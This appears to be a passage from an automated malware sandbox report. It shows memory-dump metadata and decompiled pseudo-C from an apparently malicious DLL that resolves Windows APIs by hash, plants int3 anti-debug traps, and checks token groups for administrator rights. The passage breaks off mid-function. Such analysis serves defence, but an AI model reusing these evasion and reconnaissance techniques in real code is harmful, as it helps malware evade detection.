                                                                                                                                                0x10001c50
                                                                                                                                                0x10001c51
                                                                                                                                                0x10001c54
                                                                                                                                                0x10001c58
                                                                                                                                                0x10001c5c
                                                                                                                                                0x10001c63
                                                                                                                                                0x10001c75
                                                                                                                                                0x10001c8b
                                                                                                                                                0x10001c96
                                                                                                                                                0x10001c97
                                                                                                                                                0x10001c98
                                                                                                                                                0x10001c99
                                                                                                                                                0x10001c9a
                                                                                                                                                0x10001c9d
                                                                                                                                                0x10001ca0
                                                                                                                                                0x10001ca1
                                                                                                                                                0x10001ca2
                                                                                                                                                0x10001ca9
                                                                                                                                                0x10001cac
                                                                                                                                                0x10001cb7
                                                                                                                                                0x10001cba
                                                                                                                                                0x10001cbe
                                                                                                                                                0x10001cc7
                                                                                                                                                0x10001ccf
                                                                                                                                                0x10001cd6
                                                                                                                                                0x10001cdf
                                                                                                                                                0x10001ce7
                                                                                                                                                0x10001cee
                                                                                                                                                0x10001cf7
                                                                                                                                                0x10001cff
                                                                                                                                                0x10001d04
                                                                                                                                                0x10001d0d
                                                                                                                                                0x10001d15
                                                                                                                                                0x10001d2a

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.319669645.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.319665498.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319682425.000000001001A000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319687174.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319691145.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: g
                                                                                                                                                • API String ID: 0-171373902
                                                                                                                                                • Opcode ID: d677e2debecd4237b772c6d1c6e96de3a9b3429ba9283d82259752ede6aabf95
                                                                                                                                                • Instruction ID: b442155eacf7675d39859fb34eebdae8123254ffe159dd47b7877bbbb04c0330
                                                                                                                                                • Opcode Fuzzy Hash: d677e2debecd4237b772c6d1c6e96de3a9b3429ba9283d82259752ede6aabf95
                                                                                                                                                • Instruction Fuzzy Hash: 1032C6764047059AD705DF24C852AFFB3A0EFA2388F10871DB8896A1A7FF71F985D681
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Non-executed Functions

                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                			E10010754(void* __ecx) {
                                                                                                                                                				void* __esi;
                                                                                                                                                				intOrPtr _t155;
                                                                                                                                                				signed char* _t159;
                                                                                                                                                				char _t162;
                                                                                                                                                				char _t180;
                                                                                                                                                				intOrPtr _t189;
                                                                                                                                                				char _t190;
                                                                                                                                                				intOrPtr _t196;
                                                                                                                                                				intOrPtr _t201;
                                                                                                                                                				char _t204;
                                                                                                                                                				void* _t213;
                                                                                                                                                				void* _t214;
                                                                                                                                                				char _t216;
                                                                                                                                                				char _t217;
                                                                                                                                                				char _t224;
                                                                                                                                                				char _t239;
                                                                                                                                                				char _t242;
                                                                                                                                                				char _t245;
                                                                                                                                                				char _t248;
                                                                                                                                                				char _t251;
                                                                                                                                                				char _t255;
                                                                                                                                                				char _t260;
                                                                                                                                                				void* _t269;
                                                                                                                                                				void* _t270;
                                                                                                                                                				char _t272;
                                                                                                                                                				char _t273;
                                                                                                                                                				void* _t277;
                                                                                                                                                				char _t278;
                                                                                                                                                				char _t279;
                                                                                                                                                				char _t283;
                                                                                                                                                				intOrPtr* _t292;
                                                                                                                                                				signed char _t295;
                                                                                                                                                				signed char _t296;
                                                                                                                                                				intOrPtr* _t321;
                                                                                                                                                				intOrPtr* _t326;
                                                                                                                                                				intOrPtr* _t348;
                                                                                                                                                				intOrPtr* _t364;
                                                                                                                                                				char _t365;
                                                                                                                                                				intOrPtr* _t370;
                                                                                                                                                				intOrPtr* _t373;
                                                                                                                                                				intOrPtr* _t378;
                                                                                                                                                				char _t383;
                                                                                                                                                				char _t384;
                                                                                                                                                				char _t385;
                                                                                                                                                				char _t386;
                                                                                                                                                				char _t387;
                                                                                                                                                				char _t388;
                                                                                                                                                				char _t394;
                                                                                                                                                				char _t396;
                                                                                                                                                				char _t402;
                                                                                                                                                				char _t404;
                                                                                                                                                				intOrPtr* _t405;
                                                                                                                                                				signed int _t407;
                                                                                                                                                				intOrPtr* _t410;
                                                                                                                                                				intOrPtr* _t412;
                                                                                                                                                				signed int _t414;
                                                                                                                                                				void* _t415;
                                                                                                                                                				void* _t416;
                                                                                                                                                				char _t421;
                                                                                                                                                				intOrPtr* _t424;
                                                                                                                                                				void* _t426;
                                                                                                                                                				intOrPtr* _t428;
                                                                                                                                                				void* _t429;
                                                                                                                                                				void* _t430;
                                                                                                                                                
                                                                                                                                                				_t415 = __ecx;
                                                                                                                                                				_t155 =  *0x1001d1f8;
                                                                                                                                                				if(_t155 == 0x255be0d1) {
                                                                                                                                                					_t155 = E100135F4(0x30);
                                                                                                                                                					 *0x1001d1f8 = _t155;
                                                                                                                                                				}
                                                                                                                                                				if( *((char*)(_t155 + 0xb)) == 0 || _t415 != 0) {
                                                                                                                                                					_t416 = _t429 + 0x48;
                                                                                                                                                					E10013670(_t416, 0, 0x11c);
                                                                                                                                                					_t430 = _t429 + 0xc;
                                                                                                                                                					 *((intOrPtr*)(_t430 + 0x48)) = 0x11c;
                                                                                                                                                					if(E10013044(0x10154545, 0x51a0195c, 0x10154545, 0x10154545) != 0) {
                                                                                                                                                						_push(_t416);
                                                                                                                                                						asm("int3");
                                                                                                                                                						asm("int3");
                                                                                                                                                					}
                                                                                                                                                					_t405 =  *0x1001d1f8;
                                                                                                                                                					_t159 = _t430 + 0x4c;
                                                                                                                                                					_t295 =  *_t159;
                                                                                                                                                					 *(_t405 + 8) = _t295;
                                                                                                                                                					_t296 = _t159[4];
                                                                                                                                                					 *(_t405 + 9) = _t296;
                                                                                                                                                					 *((char*)(_t405 + 0xa)) = _t159[0x110];
                                                                                                                                                					 *((intOrPtr*)(_t405 + 4)) =  *((intOrPtr*)(_t430 + 0x54));
                                                                                                                                                					 *((char*)(_t405 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
                                                                                                                                                					 *_t405 = (_t296 & 0x000000ff) + ((_t295 & 0x000000ff) << 4) - 0x50;
                                                                                                                                                					_t162 = E1001101C(_t405);
                                                                                                                                                					 *((intOrPtr*)(_t430 + 0x198)) = 0;
                                                                                                                                                					 *((char*)( *0x1001d1f8 + 0xb)) = _t162;
                                                                                                                                                					_t364 = E10013044(0x8b9d0da7, 0x8335dc52, _t162, _t162);
                                                                                                                                                					if(_t364 == 0) {
                                                                                                                                                						L12:
                                                                                                                                                						_t365 = 0;
                                                                                                                                                						L13:
                                                                                                                                                						 *((char*)( *0x1001d1f8 + 0x28)) = _t365;
                                                                                                                                                						if( *((intOrPtr*)(E10010754(0))) >= 0x10) {
                                                                                                                                                							_push(6);
                                                                                                                                                							memcpy(_t430 + 0x164, 0x1001bce0, 0 << 2);
                                                                                                                                                							_t430 = _t430 + 0xc;
                                                                                                                                                							 *((intOrPtr*)(_t430 + 0x1c)) = 0;
                                                                                                                                                							E1000F5A8(_t430 + 0x24, 0);
                                                                                                                                                							_t407 = 0;
                                                                                                                                                							__eflags = 0;
                                                                                                                                                							do {
                                                                                                                                                								E1000F84C(_t430 + 0x24, E1000F4F0(_t430 + 0x20) + 4);
                                                                                                                                                								 *((intOrPtr*)(E1000F4E0(_t430 + 0x24, E1000F4F0(_t430 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t430 + 0x164 + _t407 * 4));
                                                                                                                                                								_t407 = _t407 + 1;
                                                                                                                                                								 *((intOrPtr*)(_t430 + 0x1c)) =  *((intOrPtr*)(_t430 + 0x1c)) + 1;
                                                                                                                                                								__eflags = _t407 - 6;
                                                                                                                                                							} while (_t407 < 6);
                                                                                                                                                							_push(0);
                                                                                                                                                							E10015558(_t430 + 0xc, _t430 + 0x1c, 0x80000002);
                                                                                                                                                							E1000F678(_t430 + 0x20);
                                                                                                                                                							E10015588(_t430 + 8, _t430 + 0x1c0, 0x5e9822cf);
                                                                                                                                                							_t180 = E1001583C(_t430 + 4, __eflags,  *((intOrPtr*)(_t430 + 0x1c0)));
                                                                                                                                                							_t408 = _t180;
                                                                                                                                                							E1000DFDC(_t430 + 0x1c0);
                                                                                                                                                							__eflags = _t180;
                                                                                                                                                							if(_t180 != 0) {
                                                                                                                                                								E10015588(_t430 + 8, _t430 + 0x1c8, 0x80c4a2b7);
                                                                                                                                                								_t421 = E1001583C(_t430 + 4, __eflags,  *((intOrPtr*)(_t430 + 0x1c8)));
                                                                                                                                                								E1000DFDC(_t430 + 0x1c8);
                                                                                                                                                								_t408 = _t430 + 0x1d0;
                                                                                                                                                								E10015588(_t430 + 8, _t430 + 0x1d0, 0xa89c042f);
                                                                                                                                                								_t402 = E1001583C(_t430 + 4, __eflags,  *((intOrPtr*)(_t430 + 0x1d0)));
                                                                                                                                                								E1000DFDC(_t430 + 0x1d0);
                                                                                                                                                								__eflags = _t421;
                                                                                                                                                								if(_t421 != 0) {
                                                                                                                                                									__eflags = _t421 - 5;
                                                                                                                                                									if(_t421 != 5) {
                                                                                                                                                										__eflags = _t421 - 2;
                                                                                                                                                										if(_t421 != 2) {
                                                                                                                                                											L58:
                                                                                                                                                											E1000D020(_t430 + 0xc);
                                                                                                                                                											__eflags =  *((char*)(_t430 + 8));
                                                                                                                                                											if( *((char*)(_t430 + 8)) == 0) {
                                                                                                                                                												L65:
                                                                                                                                                												_t189 = 0;
                                                                                                                                                												__eflags = 0;
                                                                                                                                                												 *((intOrPtr*)(_t430 + 4)) = 0;
                                                                                                                                                												goto L66;
                                                                                                                                                											}
                                                                                                                                                											_t383 =  *((intOrPtr*)(_t430 + 4));
                                                                                                                                                											__eflags = _t383;
                                                                                                                                                											if(_t383 == 0) {
                                                                                                                                                												L61:
                                                                                                                                                												_t239 = 1;
                                                                                                                                                												L63:
                                                                                                                                                												__eflags = _t239;
                                                                                                                                                												if(_t239 == 0) {
                                                                                                                                                													E10015530(_t383);
                                                                                                                                                												}
                                                                                                                                                												goto L65;
                                                                                                                                                											}
                                                                                                                                                											__eflags = _t383 - 0xffffffff;
                                                                                                                                                											if(_t383 != 0xffffffff) {
                                                                                                                                                												_t239 = 0;
                                                                                                                                                												__eflags = 0;
                                                                                                                                                												goto L63;
                                                                                                                                                											}
                                                                                                                                                											goto L61;
                                                                                                                                                										}
                                                                                                                                                										__eflags = _t402 - 1;
                                                                                                                                                										if(_t402 != 1) {
                                                                                                                                                											goto L58;
                                                                                                                                                										}
                                                                                                                                                										E1000D020(_t430 + 0xc);
                                                                                                                                                										__eflags =  *((char*)(_t430 + 8));
                                                                                                                                                										if( *((char*)(_t430 + 8)) == 0) {
                                                                                                                                                											L57:
                                                                                                                                                											 *((intOrPtr*)(_t430 + 4)) = 0;
                                                                                                                                                											_t189 = 5;
                                                                                                                                                											goto L66;
                                                                                                                                                										}
                                                                                                                                                										_t384 =  *((intOrPtr*)(_t430 + 4));
                                                                                                                                                										__eflags = _t384;
                                                                                                                                                										if(_t384 == 0) {
                                                                                                                                                											L53:
                                                                                                                                                											_t242 = 1;
                                                                                                                                                											L55:
                                                                                                                                                											__eflags = _t242;
                                                                                                                                                											if(_t242 == 0) {
                                                                                                                                                												E10015530(_t384);
                                                                                                                                                											}
                                                                                                                                                											goto L57;
                                                                                                                                                										}
                                                                                                                                                										__eflags = _t384 - 0xffffffff;
                                                                                                                                                										if(_t384 != 0xffffffff) {
                                                                                                                                                											_t242 = 0;
                                                                                                                                                											__eflags = 0;
                                                                                                                                                											goto L55;
                                                                                                                                                										}
                                                                                                                                                										goto L53;
                                                                                                                                                									}
                                                                                                                                                									__eflags = _t402;
                                                                                                                                                									if(_t402 != 0) {
                                                                                                                                                										__eflags = _t402 - 1;
                                                                                                                                                										if(_t402 == 1) {
                                                                                                                                                											E1000D020(_t430 + 0xc);
                                                                                                                                                											__eflags =  *((char*)(_t430 + 8));
                                                                                                                                                											if( *((char*)(_t430 + 8)) == 0) {
                                                                                                                                                												L121:
                                                                                                                                                												 *((intOrPtr*)(_t430 + 4)) = 0;
                                                                                                                                                												_t189 = 4;
                                                                                                                                                												goto L66;
                                                                                                                                                											}
                                                                                                                                                											_t385 =  *((intOrPtr*)(_t430 + 4));
                                                                                                                                                											__eflags = _t385;
                                                                                                                                                											if(_t385 == 0) {
                                                                                                                                                												L117:
                                                                                                                                                												_t245 = 1;
                                                                                                                                                												L119:
                                                                                                                                                												__eflags = _t245;
                                                                                                                                                												if(_t245 == 0) {
                                                                                                                                                													E10015530(_t385);
                                                                                                                                                												}
                                                                                                                                                												goto L121;
                                                                                                                                                											}
                                                                                                                                                											__eflags = _t385 - 0xffffffff;
                                                                                                                                                											if(_t385 != 0xffffffff) {
                                                                                                                                                												_t245 = 0;
                                                                                                                                                												__eflags = 0;
                                                                                                                                                												goto L119;
                                                                                                                                                											}
                                                                                                                                                											goto L117;
                                                                                                                                                										}
                                                                                                                                                										goto L58;
                                                                                                                                                									}
                                                                                                                                                									E1000D020(_t430 + 0xc);
                                                                                                                                                									__eflags =  *((char*)(_t430 + 8));
                                                                                                                                                									if( *((char*)(_t430 + 8)) == 0) {
                                                                                                                                                										L45:
                                                                                                                                                										 *((intOrPtr*)(_t430 + 4)) = 0;
                                                                                                                                                										_t189 = 3;
                                                                                                                                                										goto L66;
                                                                                                                                                									}
                                                                                                                                                									_t386 =  *((intOrPtr*)(_t430 + 4));
                                                                                                                                                									__eflags = _t386;
                                                                                                                                                									if(_t386 == 0) {
                                                                                                                                                										L41:
                                                                                                                                                										_t248 = 1;
                                                                                                                                                										L43:
                                                                                                                                                										__eflags = _t248;
                                                                                                                                                										if(_t248 == 0) {
                                                                                                                                                											E10015530(_t386);
                                                                                                                                                										}
                                                                                                                                                										goto L45;
                                                                                                                                                									}
                                                                                                                                                									__eflags = _t386 - 0xffffffff;
                                                                                                                                                									if(_t386 != 0xffffffff) {
                                                                                                                                                										_t248 = 0;
                                                                                                                                                										__eflags = 0;
                                                                                                                                                										goto L43;
                                                                                                                                                									}
                                                                                                                                                									goto L41;
                                                                                                                                                								}
                                                                                                                                                								__eflags = _t402;
                                                                                                                                                								if(_t402 != 0) {
                                                                                                                                                									goto L58;
                                                                                                                                                								}
                                                                                                                                                								E1000D020(_t430 + 0xc);
                                                                                                                                                								__eflags =  *((char*)(_t430 + 8));
                                                                                                                                                								if( *((char*)(_t430 + 8)) == 0) {
                                                                                                                                                									L35:
                                                                                                                                                									 *((intOrPtr*)(_t430 + 4)) = 0;
                                                                                                                                                									_t189 = 2;
                                                                                                                                                									goto L66;
                                                                                                                                                								}
                                                                                                                                                								_t387 =  *((intOrPtr*)(_t430 + 4));
                                                                                                                                                								__eflags = _t387;
                                                                                                                                                								if(_t387 == 0) {
                                                                                                                                                									L31:
                                                                                                                                                									_t251 = 1;
                                                                                                                                                									L33:
                                                                                                                                                									__eflags = _t251;
                                                                                                                                                									if(_t251 == 0) {
                                                                                                                                                										E10015530(_t387);
                                                                                                                                                									}
                                                                                                                                                									goto L35;
                                                                                                                                                								}
                                                                                                                                                								__eflags = _t387 - 0xffffffff;
                                                                                                                                                								if(_t387 != 0xffffffff) {
                                                                                                                                                									_t251 = 0;
                                                                                                                                                									__eflags = 0;
                                                                                                                                                									goto L33;
                                                                                                                                                								}
                                                                                                                                                								goto L31;
                                                                                                                                                							}
                                                                                                                                                							E1000D020(_t430 + 0xc);
                                                                                                                                                							__eflags =  *((char*)(_t430 + 8));
                                                                                                                                                							if( *((char*)(_t430 + 8)) == 0) {
                                                                                                                                                								L25:
                                                                                                                                                								 *((intOrPtr*)(_t430 + 4)) = 0;
                                                                                                                                                								_t189 = 1;
                                                                                                                                                								goto L66;
                                                                                                                                                							}
                                                                                                                                                							_t388 =  *((intOrPtr*)(_t430 + 4));
                                                                                                                                                							__eflags = _t388;
                                                                                                                                                							if(_t388 == 0) {
                                                                                                                                                								L21:
                                                                                                                                                								_t255 = 1;
                                                                                                                                                								L23:
                                                                                                                                                								__eflags = _t255;
                                                                                                                                                								if(_t255 == 0) {
                                                                                                                                                									E10015530(_t388);
                                                                                                                                                								}
                                                                                                                                                								goto L25;
                                                                                                                                                							}
                                                                                                                                                							__eflags = _t388 - 0xffffffff;
                                                                                                                                                							if(_t388 != 0xffffffff) {
                                                                                                                                                								_t255 = 0;
                                                                                                                                                								__eflags = 0;
                                                                                                                                                								goto L23;
                                                                                                                                                							}
                                                                                                                                                							goto L21;
                                                                                                                                                						} else {
                                                                                                                                                							_t189 = 1;
                                                                                                                                                							L66:
                                                                                                                                                							 *((intOrPtr*)( *0x1001d1f8 + 0x24)) = _t189;
                                                                                                                                                							_t190 = E10011054(0xffffffffffffffff);
                                                                                                                                                							_t321 =  *0x1001d1f8;
                                                                                                                                                							 *((char*)(_t321 + 0x29)) = _t190;
                                                                                                                                                							 *((intOrPtr*)(_t321 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
                                                                                                                                                							if( *_t321 >= 0x10) {
                                                                                                                                                								__eflags = 0xffffffffffffffff;
                                                                                                                                                								 *((intOrPtr*)( *0x1001d1f8 + 0x2c)) = E100110C8(0xffffffffffffffff);
                                                                                                                                                								L78:
                                                                                                                                                								_t370 = E10013044(0x10154545, 0xccc77b1, 0x10154545, 0x10154545);
                                                                                                                                                								if(_t370 != 0) {
                                                                                                                                                									 *_t370(_t430 + 0x164);
                                                                                                                                                								}
                                                                                                                                                								_t196 =  *0x1001d1f8;
                                                                                                                                                								_t292 = _t430 + 0x178;
                                                                                                                                                								_t410 = _t430 + 0x170;
                                                                                                                                                								 *((short*)(_t196 + 0xe)) =  *_t292;
                                                                                                                                                								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t292 - 0x10));
                                                                                                                                                								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t292 - 0xc));
                                                                                                                                                								 *((intOrPtr*)(_t196 + 0x18)) =  *_t410;
                                                                                                                                                								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t410 + 0x10));
                                                                                                                                                								return _t196;
                                                                                                                                                							}
                                                                                                                                                							 *((intOrPtr*)(_t430 + 0x19c)) = 0;
                                                                                                                                                							_t373 = E10013044(0x8b9d0da7, 0x8335dc52, 0x8b9d0da7, 0x8b9d0da7);
                                                                                                                                                							if(_t373 == 0) {
                                                                                                                                                								L74:
                                                                                                                                                								_t201 =  *0x1001d1f8;
                                                                                                                                                								if( *((char*)(_t201 + 0x28)) == 0) {
                                                                                                                                                									 *((intOrPtr*)(_t201 + 0x2c)) = 3;
                                                                                                                                                								} else {
                                                                                                                                                									 *((intOrPtr*)(_t201 + 0x2c)) = 5;
                                                                                                                                                								}
                                                                                                                                                								goto L78;
                                                                                                                                                							}
                                                                                                                                                							_push(_t430 + 0x19c);
                                                                                                                                                							_push(8);
                                                                                                                                                							_push(0xffffffff);
                                                                                                                                                							if( *_t373() == 0) {
                                                                                                                                                								_t204 = E100135C8(_t408);
                                                                                                                                                								__eflags = _t204;
                                                                                                                                                								if(_t204 != 0) {
                                                                                                                                                									goto L74;
                                                                                                                                                								}
                                                                                                                                                							}
                                                                                                                                                							 *((intOrPtr*)(_t430 + 0x30)) =  *((intOrPtr*)(_t430 + 0x19c));
                                                                                                                                                							 *((char*)(_t430 + 0x34)) = 1;
                                                                                                                                                							 *((intOrPtr*)(_t430 + 0x1a4)) = 0;
                                                                                                                                                							_t326 = E10013044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
                                                                                                                                                							if(_t326 != 0) {
                                                                                                                                                								_push(_t430 + 0x1a4);
                                                                                                                                                								_push(0);
                                                                                                                                                								_push(0);
                                                                                                                                                								_push(1);
                                                                                                                                                								_push( *((intOrPtr*)(_t430 + 0x1ac)));
                                                                                                                                                								if( *_t326() == 0) {
                                                                                                                                                									E100135C8(_t408);
                                                                                                                                                								}
                                                                                                                                                							}
                                                                                                                                                							_t207 =  *((intOrPtr*)(_t430 + 0x1a4));
                                                                                                                                                							if( *((intOrPtr*)(_t430 + 0x1a4)) != 0) {
                                                                                                                                                								E1000F5A8(_t430 + 0x18c, _t207);
                                                                                                                                                								_t412 = E10013044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
                                                                                                                                                								__eflags = _t412;
                                                                                                                                                								if(_t412 == 0) {
                                                                                                                                                									L133:
                                                                                                                                                									E1000F678(_t430 + 0x188);
                                                                                                                                                									goto L72;
                                                                                                                                                								}
                                                                                                                                                								_t213 = E1000F4E0(_t430 + 0x18c, 0);
                                                                                                                                                								_t214 = E1000F4F0(_t430 + 0x188);
                                                                                                                                                								_t216 =  *_t412( *((intOrPtr*)(_t430 + 0x1ac)), 1, _t213, _t214, _t430 + 0x1a4);
                                                                                                                                                								__eflags = _t216;
                                                                                                                                                								if(_t216 == 0) {
                                                                                                                                                									_t217 = E100135C8(_t412);
                                                                                                                                                									__eflags = _t217;
                                                                                                                                                									if(_t217 != 0) {
                                                                                                                                                										goto L133;
                                                                                                                                                									}
                                                                                                                                                								}
                                                                                                                                                								_t424 = E1000F4E0(_t430 + 0x18c, 0);
                                                                                                                                                								E1000DF84(_t430 + 0x1b4, 0);
                                                                                                                                                								 *((intOrPtr*)(_t430 + 0x1ac)) = 0;
                                                                                                                                                								_t378 = E10013044(0x8b9d0da7, 0x628b2cfa, 0x8b9d0da7, 0x8b9d0da7);
                                                                                                                                                								__eflags = _t378;
                                                                                                                                                								if(_t378 != 0) {
                                                                                                                                                									 *_t378( *_t424, _t430 + 0x1ac);
                                                                                                                                                								}
                                                                                                                                                								E1000DFF8(_t430 + 0x1b4,  *((intOrPtr*)(_t430 + 0x1ac)));
                                                                                                                                                								_t224 = E10013044(0x10154545, 0x44fb2dcc, 0x10154545, 0x10154545);
                                                                                                                                                								__eflags = _t224;
                                                                                                                                                								if(_t224 != 0) {
                                                                                                                                                									_push( *((intOrPtr*)(_t430 + 0x1ac)));
                                                                                                                                                									asm("int3");
                                                                                                                                                									asm("int3");
                                                                                                                                                								}
                                                                                                                                                								E1000E0A4(_t430 + 0x1b8 - 8, _t430 + 0x1b8);
                                                                                                                                                								_t426 = E10014FD4( *((intOrPtr*)(_t430 + 0x1b8)), E1000E8D4( *((intOrPtr*)(_t430 + 0x1b8)), 0x7fffffff));
                                                                                                                                                								E1000DFDC(_t430 + 0x1b8);
                                                                                                                                                								E1000DFDC(_t430 + 0x1b0);
                                                                                                                                                								E1000F678(_t430 + 0x188);
                                                                                                                                                								__eflags =  *((char*)(_t430 + 0x34));
                                                                                                                                                								if( *((char*)(_t430 + 0x34)) != 0) {
                                                                                                                                                									E1000BB88(_t430 + 0x30);
                                                                                                                                                								}
                                                                                                                                                								__eflags = _t426 - 0x6df4cf7;
                                                                                                                                                								if(_t426 != 0x6df4cf7) {
                                                                                                                                                									goto L74;
                                                                                                                                                								} else {
                                                                                                                                                									 *((intOrPtr*)( *0x1001d1f8 + 0x2c)) = 6;
                                                                                                                                                									goto L78;
                                                                                                                                                								}
                                                                                                                                                							} else {
                                                                                                                                                								L72:
                                                                                                                                                								if( *((char*)(_t430 + 0x34)) != 0) {
                                                                                                                                                									E1000BB88(_t430 + 0x30);
                                                                                                                                                								}
                                                                                                                                                								goto L74;
                                                                                                                                                							}
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                					_push(_t430 + 0x198);
                                                                                                                                                					_push(8);
                                                                                                                                                					_push(0xffffffff);
                                                                                                                                                					if( *_t364() == 0) {
                                                                                                                                                						_t260 = E100135C8(_t405);
                                                                                                                                                						__eflags = _t260;
                                                                                                                                                						if(_t260 != 0) {
                                                                                                                                                							goto L12;
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                					 *((intOrPtr*)(_t430 + 0x14)) =  *((intOrPtr*)(_t430 + 0x198));
                                                                                                                                                					 *((char*)(_t430 + 0x18)) = 1;
                                                                                                                                                					 *((intOrPtr*)(_t430 + 0x1a0)) = 0;
                                                                                                                                                					_t348 = E10013044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
                                                                                                                                                					if(_t348 != 0) {
                                                                                                                                                						_push(_t430 + 0x1a0);
                                                                                                                                                						_push(0);
                                                                                                                                                						_push(0);
                                                                                                                                                						_push(2);
                                                                                                                                                						_push( *((intOrPtr*)(_t430 + 0x1a8)));
                                                                                                                                                						if( *_t348() == 0) {
                                                                                                                                                							E100135C8(_t405);
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                					_t263 =  *((intOrPtr*)(_t430 + 0x1a0));
                                                                                                                                                					if( *((intOrPtr*)(_t430 + 0x1a0)) != 0) {
                                                                                                                                                						E1000F5A8(_t430 + 0x3c, _t263);
                                                                                                                                                						_t408 = E10013044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
                                                                                                                                                						__eflags = _t408;
                                                                                                                                                						if(_t408 == 0) {
                                                                                                                                                							L107:
                                                                                                                                                							E1000F678(_t430 + 0x38);
                                                                                                                                                							goto L10;
                                                                                                                                                						}
                                                                                                                                                						_t269 = E1000F4E0(_t430 + 0x3c, 0);
                                                                                                                                                						_t270 = E1000F4F0(_t430 + 0x38);
                                                                                                                                                						_t272 =  *_t408( *((intOrPtr*)(_t430 + 0x1a8)), 2, _t269, _t270, _t430 + 0x1a0);
                                                                                                                                                						__eflags = _t272;
                                                                                                                                                						if(_t272 == 0) {
                                                                                                                                                							_t273 = E100135C8(_t408);
                                                                                                                                                							__eflags = _t273;
                                                                                                                                                							if(_t273 != 0) {
                                                                                                                                                								goto L107;
                                                                                                                                                							}
                                                                                                                                                						}
                                                                                                                                                						_t428 = E1000F4E0(_t430 + 0x3c, 0);
                                                                                                                                                						 *((intOrPtr*)(_t430 + 0x1d8 - 0x30)) = 0;
                                                                                                                                                						asm("movsd");
                                                                                                                                                						asm("movsb");
                                                                                                                                                						asm("movsb");
                                                                                                                                                						_t408 = E10013044(0x8b9d0da7, 0xbdc0a291, 0x8b9d0da7, 0x8b9d0da7);
                                                                                                                                                						__eflags = _t408;
                                                                                                                                                						if(_t408 == 0) {
                                                                                                                                                							goto L107;
                                                                                                                                                						}
                                                                                                                                                						_t277 = _t430 + 0x1a8;
                                                                                                                                                						_t278 =  *_t408(_t277 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t277);
                                                                                                                                                						__eflags = _t278;
                                                                                                                                                						if(_t278 == 0) {
                                                                                                                                                							_t279 = E100135C8(_t408);
                                                                                                                                                							__eflags = _t279;
                                                                                                                                                							if(_t279 != 0) {
                                                                                                                                                								goto L107;
                                                                                                                                                							}
                                                                                                                                                						}
                                                                                                                                                						_t404 =  *((intOrPtr*)(_t430 + 0x1a8));
                                                                                                                                                						__eflags =  *_t428;
                                                                                                                                                						if( *_t428 <= 0) {
                                                                                                                                                							L101:
                                                                                                                                                							__eflags = _t404;
                                                                                                                                                							if(_t404 == 0) {
                                                                                                                                                								L103:
                                                                                                                                                								_t394 = 1;
                                                                                                                                                								L105:
                                                                                                                                                								__eflags = _t394;
                                                                                                                                                								if(_t394 == 0) {
                                                                                                                                                									E10010FF8(_t404, _t408, _t404);
                                                                                                                                                								}
                                                                                                                                                								goto L107;
                                                                                                                                                							}
                                                                                                                                                							__eflags = _t404 - 0xffffffff;
                                                                                                                                                							if(_t404 != 0xffffffff) {
                                                                                                                                                								_t394 = 0;
                                                                                                                                                								__eflags = 0;
                                                                                                                                                								goto L105;
                                                                                                                                                							}
                                                                                                                                                							goto L103;
                                                                                                                                                						}
                                                                                                                                                						_t414 = 0;
                                                                                                                                                						__eflags = 0;
                                                                                                                                                						do {
                                                                                                                                                							_t283 = E10013044(0x8b9d0da7, 0x2ae47d4a, 0x8b9d0da7, 0x8b9d0da7);
                                                                                                                                                							__eflags = _t283;
                                                                                                                                                							if(_t283 == 0) {
                                                                                                                                                								goto L100;
                                                                                                                                                							}
                                                                                                                                                							_push( *((intOrPtr*)(_t428 + 4 + _t414 * 8)));
                                                                                                                                                							_push( *((intOrPtr*)(_t430 + 0x1ac)));
                                                                                                                                                							asm("int3");
                                                                                                                                                							asm("int3");
                                                                                                                                                							__eflags = _t283;
                                                                                                                                                							if(_t283 == 0) {
                                                                                                                                                								goto L100;
                                                                                                                                                							}
                                                                                                                                                							__eflags = _t404;
                                                                                                                                                							if(_t404 == 0) {
                                                                                                                                                								L93:
                                                                                                                                                								_t396 = 1;
                                                                                                                                                								L95:
                                                                                                                                                								__eflags = _t396;
                                                                                                                                                								if(_t396 == 0) {
                                                                                                                                                									E10010FF8(_t404, _t414, _t404);
                                                                                                                                                								}
                                                                                                                                                								E1000F678(_t430 + 0x38);
                                                                                                                                                								__eflags =  *((char*)(_t430 + 0x18));
                                                                                                                                                								if( *((char*)(_t430 + 0x18)) != 0) {
                                                                                                                                                									E1000BB88(_t430 + 0x14);
                                                                                                                                                								}
                                                                                                                                                								_t365 = 1;
                                                                                                                                                								goto L13;
                                                                                                                                                							}
                                                                                                                                                							__eflags = _t404 - 0xffffffff;
                                                                                                                                                							if(_t404 != 0xffffffff) {
                                                                                                                                                								_t396 = 0;
                                                                                                                                                								__eflags = 0;
                                                                                                                                                								goto L95;
                                                                                                                                                							}
                                                                                                                                                							goto L93;
                                                                                                                                                							L100:
                                                                                                                                                							_t414 = _t414 + 1;
                                                                                                                                                							__eflags = _t414 -  *_t428;
